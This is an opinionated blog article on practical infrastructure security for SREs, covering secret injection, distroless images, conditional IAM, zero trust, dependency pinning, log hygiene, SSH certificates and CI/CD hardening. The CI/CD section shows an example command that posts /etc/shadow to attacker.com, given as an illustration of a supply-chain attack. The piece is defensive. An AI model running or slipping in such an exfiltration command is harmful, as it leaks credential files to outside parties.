Table of Contents
Your Security Checklist is a Liability: Real-World Cybersecurity Best Practices for the Cynical SRE
I once took down an entire payment gateway because I thought I was being clever with secret rotation. It was 3:00 AM. I had scripted a rolling update for our production Vault cluster, but I forgot to account for the token TTL on our legacy sidecars. When the old tokens expired, the sidecars couldn’t re-authenticate because the new Vault nodes were still in a sealed state, waiting for manual unseal keys that were stored in a “secure” physical safe three miles away from my home office. The site stayed dark for four hours while I drove through a thunderstorm to get a piece of paper with a hex string on it.
That is the reality of “cybersecurity best” practices. They look great on a SOC2 compliance spreadsheet, but they fail spectacularly when they meet the friction of real-world infrastructure. We spend millions on “Next-Gen AI-Driven Threat Detection” but then we leave a .git directory in a public S3 bucket or hardcode a STRIPE_LIVE_KEY in a Dockerfile because “it’s just for the staging build.” If you’re looking for a list of tools to buy, close this tab. If you want to know how to stop your infrastructure from becoming a headline, let’s talk about the trade-offs that actually matter.
The Environment Variable Trap
Most “cybersecurity best” guides tell you to store secrets in environment variables. This is lazy advice. Environment variables are essentially public knowledge once someone gets a shell on your container. Anyone who can run ps aux or cat /proc/1/environ can see your database credentials. If you use a crash reporting tool like Sentry or Datadog, and your app throws an unhandled exception, there is a non-zero chance your entire environment block is being shipped to a third-party SaaS platform in a stack trace.
Stop doing this. Use a filesystem-based secret injection. If you are on Kubernetes, use the Secrets Store CSI Driver. It mounts secrets as files in a tmpfs volume. When the pod dies, the secrets vanish from memory. They aren’t persisted to disk, and they aren’t sitting in the process environment block for every child process to inherit.
# This is what a real SecretProviderClass looks like.
# Don't use the 'secretObjects' sync unless you absolutely need
# to support legacy apps that can't read from a file.
apiVersion: secrets-store.csi.x-k8s.io/v1
kind: SecretProviderClass
metadata:
name: api-secrets-vault
spec:
provider: vault
parameters:
vaultAddress: "https://vault.internal.production:8200"
roleName: "api-service-role"
objects: |
- objectName: "db-password"
secretPath: "secret/data/production/api"
secretKey: "password"
- objectName: "api-key"
secretPath: "secret/data/production/api"
secretKey: "key"
Pro-tip: If you must use environment variables for legacy reasons, at least use a wrapper that clears them after the process starts. But honestly? Just fix the app to read from /var/run/secrets/. It takes ten minutes of coding and saves you a week of incident response.
The Alpine Linux Myth
The industry has a strange obsession with Alpine Linux for Docker images. “It’s small!” they say. “The attack surface is tiny!” they claim. Here is what they don’t tell you: Alpine uses musl instead of glibc. I have lost count of the number of times I’ve seen mysterious performance degradation or DNS resolution bugs because a Python or Node.js library expected glibc behavior and got musl instead.
From a security perspective, Alpine is also a pain. Because it’s so minimal, the moment you need to debug something in production, you realize you don’t even have curl or dig. So what do developers do? They add apk add --no-cache curl bind-tools to the Dockerfile. Now you’ve just manually rebuilt a larger attack surface, but with the added bonus of potential binary incompatibilities.
Use debian-slim or, better yet, Google’s distroless images. Distroless contains only your application and its runtime dependencies. No shell. No package manager. No ls. If an attacker gets an RCE (Remote Code Execution) in a distroless container, they can’t even cd into a directory to look around. They have to bring their own toolset, which is a much higher bar to clear.
- Distroless images reduce the number of “Critical” and “High” vulnerabilities in your Snyk/Trivy scans by about 80% compared to standard Ubuntu images.
- You avoid the
LD_PRELOADtrickery that attackers use to hijack library calls. - Your CI/CD pipeline runs faster because you aren’t pulling 200MB of bloated OS layers.
- Debugging is harder, yes. Use
kubectl debugwith an ephemeral container instead of baking tools into your production image.
IAM: The “Action: *” Sin
Identity and Access Management (IAM) is where security goes to die. I’ve audited “secure” AWS environments where the S3-Read-Only policy was attached to a role that also had iam:PassRole permissions. Congratulations, you just gave that user administrative access to the entire account via an EC2 instance profile escalation.
The “cybersecurity best” approach to IAM is not just “Least Privilege.” It’s “Least Privilege with Conditions.” If you have a Lambda function that needs to write to an S3 bucket, don’t just give it s3:PutObject on arn:aws:s3:::my-bucket/*. Use conditions to restrict the IP address, the encryption status, and even the time of day if you’re feeling spicy.
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowPutObjectOnlyWithEncryption",
"Effect": "Allow",
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::customer-data-uploads-prod/*",
"Condition": {
"StringEquals": {
"s3:x-amz-server-side-encryption": "aws:kms"
},
"ArnEquals": {
"aws:PrincipalArn": "arn:aws:iam::123456789012:role/api-worker-role"
}
}
}
]
}
Note to self: Always check for iam:CreateAccessKey permissions. I once saw a developer create a “service account” user for a CI/CD pipeline and give it this permission so it could “manage its own keys.” An attacker compromised the CI/CD, generated 500 access keys, and used them to bypass rate limits while exfiltrating the entire database.
The False Security of the VPN
If your security strategy relies on “being on the VPN,” you are living in 2005. VPNs are a single point of failure. Once an attacker phishes a single employee and gets their VPN credentials (and bypasses the often-flimsy MFA), they are “inside” the network. From there, it’s a lateral movement playground.
The “cybersecurity best” move is to move toward a Zero Trust architecture. Use something like Tailscale or Cloudflare Access. Every single request to an internal tool—whether it’s your Jenkins instance or a staging DB—should be authenticated and authorized at the application layer, not just the network layer.
I’ve seen companies spend $50k on a hardware firewall while their internal Jira instance was running a version from 2018 with a known RCE. Because it was “behind the VPN,” they didn’t think it was a priority. Then a contractor’s laptop got infected with Emotet, and suddenly the “secure” internal network was a botnet node.
Stop trusting the network. Start trusting the identity. Every internal service should require an OIDC (OpenID Connect) token. No exceptions. If your internal tool doesn’t support OIDC, put an oauth2-proxy in front of it. It’s a 5MB Go binary that saves you from a multi-million dollar breach.
Dependency Hell and the “Audit” Lie
Running npm audit is not a security strategy. It’s a way to generate noise that developers eventually learn to ignore. Most of the “vulnerabilities” reported by these tools are “Moderate” ReDoS (Regular Expression Denial of Service) bugs in build-time dependencies that will never see a single byte of production traffic.
You need to prioritize. Focus on the supply chain. If you are pulling latest for any dependency, you are asking for a bad time. Pin your versions. Pin your hashes.
# Bad: You have no idea what version of the base image you're getting tomorrow
FROM node:18
# Better: You've pinned the version, but the tag can still be overwritten
FROM node:18.16.0-slim
# Best: You've pinned the SHA256 digest. This is immutable.
FROM node:18.16.0-slim@sha256:e363026139158913989369836913691369136913691369136913691369136913
The same applies to your application code. Use package-lock.json, go.sum, or requirements.txt with hashes. I remember the ua-parser-js hijack in 2021. People who were pinning versions but not hashes still got hit because the attacker published a malicious version under an existing version number (though rare, it happens) or users were using ranges like ^0.7.28.
Pro-tip: Use a tool like Renovate or Dependabot, but configure it to only auto-merge “Patch” updates for non-critical libraries. For anything else, you need a human to look at the changelog. Yes, it’s slow. Yes, it’s “friction.” That’s the point.
Logging: The Log4j Lesson
We all remember December 2021. The world burned because a logging library was too powerful for its own good. But the real lesson of Log4j wasn’t “update your jars.” It was “don’t log what you don’t control.”
I’ve seen SREs log the entire User-Agent string, the X-Forwarded-For header, and the full request body of every 400-level error. This is a goldmine for attackers. If I can inject a payload into a header that you then log, I can potentially trigger a vulnerability in your logging pipeline—whether it’s Log4j, an Elasticsearch injection, or a buffer overflow in a legacy syslog-ng parser.
Sanitize your logs. Use a structured logging library (like zap in Go or structlog in Python) and explicitly define the fields you want to capture. Never, ever log PII (Personally Identifiable Information). I once had to spend a weekend scrubbing 40TB of S3 logs because a junior dev decided to log the auth_payload which contained raw credit card numbers in plain text.
{
"level": "error",
"ts": 1625097600.123,
"caller": "api/handler.go:42",
"msg": "failed to process payment",
"request_id": "req_9a8b7c6d",
"user_id": "user_12345",
"error": "invalid expiry date",
"stacktrace": "..."
}
Note that we log the user_id and request_id, but not the card_number or the cvv. This seems obvious, but when you’re 12 hours into a production outage, “log everything” becomes a very tempting (and dangerous) mantra.
The SSH Key Management Nightmare
If you are still manually adding id_rsa.pub strings to authorized_keys files, you are operating a ticking time bomb. People leave companies. People lose laptops. People “borrow” keys from coworkers.
The “cybersecurity best” practice here is to stop using static SSH keys entirely. Use SSH Certificates. Netflix’s BLESS or HashiCorp Vault’s SSH secrets engine are the gold standard. A user authenticates with their SSO (Okta, Google, etc.), and in exchange, they get a short-lived (e.g., 1 hour) SSH certificate signed by your internal CA.
If a laptop is stolen, the key is already expired. If an employee is fired, their SSO access is revoked, and they can no longer request new certificates. No more authorized_keys cleanup scripts that inevitably miss one server and leave a backdoor open for years.
If you can’t do certificates yet, at least use ProxyJump through a bastion host that has mandatory MFA. And for the love of all that is holy, disable password authentication in /etc/ssh/sshd_config:
# /etc/ssh/sshd_config
PasswordAuthentication no
PubkeyAuthentication yes
PermitRootLogin no
MaxAuthTries 3
AllowAgentForwarding no
X11Forwarding no
The “Break Glass” Procedure
Security is often at odds with availability. If you lock down your production environment so tightly that no one can access it, what happens when the database is deadlocking and the automated scripts are failing?
You need a “Break Glass” procedure. This is a documented, tested way to gain emergency administrative access. It should involve:
- A physical or digital “vault” (like a 1Password for Teams vault) that requires multiple people to approve access.
- Immediate, high-priority alerting (PagerDuty, Slack, Email) the moment those credentials are used.
- A mandatory post-mortem every time the “Break Glass” is used to figure out why the standard, automated tools weren’t enough.
- Automatic rotation of the credentials immediately after the incident is resolved.
- Hardened logging that cannot be deleted by the “Break Glass” user (e.g., streaming logs to a separate, write-only AWS account).
- A clear definition of what constitutes an “emergency.”
Without a Break Glass procedure, your SREs will find “creative” ways to bypass security controls when the pressure is on. And “creative” is just another word for “vulnerable.”
The CI/CD Pipeline: Your Biggest Vulnerability
We spend so much time hardening production, but we treat our CI/CD pipelines like a playground. Your CI/CD system (GitHub Actions, GitLab CI, Jenkins) has the keys to the kingdom. It can deploy code, it can modify infrastructure, and it often has access to your most sensitive secrets.
If I’m an attacker, I’m not going to try to exploit your hardened Kubernetes cluster. I’m going to submit a PR to a random internal repo that adds a curl -X POST -d @/etc/shadow attacker.com line to your build.sh. If your CI/CD isn’t configured to require approval for PRs from forks, or if it runs on every commit without oversight, I’m in.
Cybersecurity best practices for CI/CD:
- OIDC for Cloud Access: Stop storing AWS Access Keys in GitHub Secrets. Use OIDC to get temporary credentials.
- Isolated Runners: Don’t share runners between projects. A compromised build in a “test” project shouldn’t be able to steal secrets from a “production” project.
- Immutable Build Artifacts: Build your image once, sign it (using Cosign/Sigstore), and promote that exact image through your environments. Never rebuild the same code for staging and production.
- Network Isolation: Your CI runners should not have unrestricted outbound internet access. They need to talk to your package registry and your cloud provider’s API. That’s it.
I once saw a Jenkins server that had been “temporarily” given AdministratorAccess in AWS so it could debug a Terraform issue. It stayed that way for six months. When a plugin with a known vulnerability was exploited, the attacker didn’t just get the Jenkins server; they got the entire AWS organization. They started spinning up p3.16xlarge instances for crypto mining, and the company didn’t notice until the $40,000 bill arrived at the end of the month.
The Reality of “Cybersecurity Best”
The truth is that “cybersecurity best” isn’t about a specific tool or a specific configuration. It’s about reducing the “Blast Radius.” You have to assume that every component of your system will be compromised at some point. The process, the container, the node, the network, the developer’s laptop—they are all fallible.
Your job as an SRE isn’t to build a wall that can’t be breached. It’s to build a system where a breach in one area doesn’t lead to a total collapse. This means defense in depth. It means mTLS between services. It means granular IAM roles. It means not being afraid to say “no” to a developer who wants to run their container as root because they’re too lazy to fix a permission issue in their /app/data folder.
Stop chasing the hype. Stop buying the “AI-powered” blinky-light boxes. Fix your secrets, harden your images, and for the love of God, rotate your keys. Security is a boring, repetitive, and often thankless job. But it’s a lot better than being the person who has to explain to the board why the company’s entire database is for sale on a Telegram channel for $500 in Monero.
If you can’t explain the technical trade-off of a security decision, you aren’t practicing security; you’re practicing superstition.
Related Articles
Explore more insights and best practices: